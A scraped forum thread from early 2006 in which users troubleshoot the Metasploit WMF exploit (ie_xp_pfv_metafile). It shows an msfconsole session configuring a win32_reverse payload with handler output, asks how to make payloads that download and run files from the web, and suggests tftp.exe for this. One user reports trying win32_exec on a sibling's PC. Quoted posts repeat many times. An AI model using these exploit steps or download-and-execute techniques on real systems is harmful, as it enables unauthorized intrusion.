When I do this between two machines on my LAN it seems to hang at [*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.102:8080/
[*] HTTP Client connected from 192.168.1.100:1323, redirecting...
[*] HTTP Client connected from 192.168.1.100:1324, sending 1980 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
Am I doing something wrong or is there something else I need to to?
This post has been edited by shatter: 03 January 2006 - 07:48 PM
When I do this between two machines on my LAN it seems to hang at [*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.102:8080/
[*] HTTP Client connected from 192.168.1.100:1323, redirecting...
[*] HTTP Client connected from 192.168.1.100:1324, sending 1980 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
-------------------------------------------------
Am I doing something wrong or is there something else I need to to?
I don't think you are doing some thing wrong. I tried it successfuly yesterday. but today I got the same thing than you. IT SEEMS TO ME THAT IT HAS BEEN PATCHED.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Used with permission by san[at]xfocus.org:
------------------------------------------
....
Is this some stuff to put in a file to make a vuln pic?
after searching and searching i found the most things myselve. but i cant find anything about the payloads.
what is that? is that some kind of program? how can i make my own payload that download something from
the web?
This post has been edited by mrgoolie: 04 January 2006 - 02:58 AM
after searching and searching i found the most things myselve. but i cant find anything about the payloads.
what is that? is that some kind of program? how can i make my own payload that download something from
the web?
after hours searching for more information i understand the wmf exploit.
but still some little questions, the payload win32_adduser doenst work here,
i always get an error.
and has anybody already found a way to make a payload that uploads
and executes a file? i tried with win32_exec but i cant find a way to give
parameters to the ftp.exe command, and i think that firefox is also patched,
because i cant find a working way to exploit....
I tested it on my brothers pc with the win32_exec command, and then the cmd:
calc.exe and it works, so when i go to that site, it opens calc.exe.
now i just want to find a way so it downloads a file from the internet... and opens it
This post has been edited by mrgoolie: 04 January 2006 - 04:48 AM
after hours searching for more information i understand the wmf exploit.
but still some little questions, the payload win32_adduser doenst work here,
i always get an error.
and has anybody already found a way to make a payload that uploads
and executes a file? i tried with win32_exec but i cant find a way to give
parameters to the ftp.exe command, and i think that firefox is also patched,
because i cant find a working way to exploit....
Instead of using ftp.exe you could use tftp.exe, it doesn't have an own shell, just type tftp.exe /? for more information!
I can't uninstall it, there seems to be some kind of "Uninstall Shield".
Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.
Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.
So any one know a site were I can grab the app?
Thanks in advanced
www.metasploit.com
download it there
the exploit is in the framework
Long time no post :) I need to see if I can get hold of the "WMF maker" app, as I need to test my GW security to make sure it is stripping out the WMF code.
So any one know a site were I can grab the app?
Thanks in advanced
www.metasploit.com
download it there
the exploit is in the framework
maybe he means an apps for WMF creation and not the exploit or am i wrong?....I've saw that tool on another site, if u really need that tool i can post here...
Yep that is what I mean. I need to make the WMF files to pass through a number of different levels of GW security devices, so although I could do it via Metasploit it would be easier if I had the file :) If you could post it or the URL it would be great.
Yep that is what I mean. I need to make the WMF files to pass through a number of different levels of GW security devices, so although I could do it via Metasploit it would be easier if I had the file :) If you could post it or the URL it would be great.
sure but seems that i can't attach files....if u want i'll send it by email :) let me know
Sign In
Register
Help
MultiQuote
Posted 04 January 2006 - 04:40 AM
